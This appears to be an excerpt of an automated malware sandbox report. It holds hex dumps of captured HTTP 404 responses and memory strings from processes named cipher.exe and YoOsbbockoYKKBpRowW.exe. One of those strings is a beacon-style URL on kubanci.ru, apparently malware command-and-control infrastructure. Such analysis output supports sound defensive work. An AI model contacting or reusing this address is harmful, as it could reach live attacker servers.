            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx-reuseport/1.21.1Date: Thu, 23 May 2024 13:21:50 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 65 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f 41 4b c4 30 10 85 ef fd 15 e3 9e f4 b0 99 ba 74 c1 43 08 e8 b6 8b 0b 75 2d 9a 1e 3c 46 33 92 40 4d 6b 92 6e d5 5f 6f da 45 f0 32 f0 66 be 79 bc c7 2f ca c7 9d 7c 69 2a b8 97 0f 35 34 ed 5d 7d d8 c1 6a 8d 78 a8 e4 1e b1 94 e5 f9 b2 61 39 62 75 5c 89 8c 9b f8 d1 09 6e 48 e9 24 a2 8d 1d 89 22 2f e0 d8 47 d8 f7 a3 d3 1c cf cb 8c e3 02 f1 d7 5e 7f cf 7f d7 e2 1f 93 54 c6 07 21 0d 81 a7 cf 91 42 24 0d ed 53 0d 93 0a e0 12 f7 3e 73 d0 3b 88 c6 06 08 e4 4f e4 19 c7 61 76 f2 69 28 ad 3d 85 20 6e 07 f5 66 08 37 ac 60 db 2d 5c b6 ce 7e 5d c1 f3 82 83 8a 30 4d 13 d3 27 fb 63 c8 59 5a 0f aa eb 28 32 3f 42 d3 fb 08 37 39 c7 3f 9f 14 77 09 9a a2 cd 05 b3 5f 16 91 e4 31 1b 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: edMAK0tCu-<F3@Mkn_oE2fy/|i*54]}jxa9bu\nH$"/G^T!B$S>s;Oavi(= nf7`-\~]0M'cYZ(2?B79?w_10
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx-reuseport/1.21.1Date: Thu, 23 May 2024 13:21:53 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 283Connection: closeVary: Accept-EncodingData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 35 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 64 76 69 7a 68 65 6e 69 65 2d 70 61 6c 6c 65 74 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.55 (Unix) Server at www.dvizhenie-pallet.ru Port 80</address></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 13:22:00 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 13:22:03 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 13:22:06 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 13:22:08 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 23 May 2024 13:22:43 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 23 May 2024 13:22:49 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "636d2d22-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 23 May 2024 13:22:51 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "636d2d22-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 23 May 2024 13:22:54 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "636d2d22-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
            Source: cipher.exe, 00000004.00000002.4527269915.0000000005ED6000.00000004.10000000.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4526025642.0000000003376000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://fedoraproject.org/
            Source: cipher.exe, 00000004.00000002.4527269915.0000000006E8A000.00000004.10000000.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4526025642.000000000432A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://kubanci.ru/3nn5/?FNPd=4XBe2xrQoWjnswKLKDm2mj9gze7KON4v3N
